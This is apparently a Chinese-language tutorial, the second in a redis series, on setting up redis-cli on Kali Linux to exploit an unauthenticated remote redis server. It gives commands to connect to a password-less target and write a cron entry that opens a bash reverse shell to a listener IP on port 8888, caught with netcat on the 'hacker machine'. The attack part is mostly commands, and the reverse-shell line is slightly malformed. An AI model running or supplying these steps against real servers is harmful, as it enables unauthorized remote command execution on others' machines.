redis学习（二）redis在kali中安装并写入shell

书接上篇，我们这里需要在kali中安装redis，这样我们才可以通过对方的未授权漏洞，进行一个远程的链接。

“ 新手走好每一步，就是前进的方向，追逐自己的梦吧。”

这里我们需要在kali中搭建，然后我们需要用kali中的redis来远程链接目标的redis

wget http://download.redis.io/redis-stable.tar.gz

这里步骤差不多，下载之后解压

tar -zxvf 文件名

然后我们到目录下进行make命令执行

然后根据提示我们安装test库

make test

cp src/redis-cli /usr/bin

所以我们这里可以使用命令链接上没有密码的centos上的redis，

redis-cli -h 目标IP

然后我们连接上对方的redis之后我们可以设置计划任务反弹shell

ubuntu不可以，centos可以。

先访问服务器。然后我们设置计划任务

set haha "\n\n* * * * * bash -i >& /dev/tcp/192.168.119.135/8888 0>&\n\n"

我们在黑客机器就可以打开nc接收反弹。

nc -lvp 8888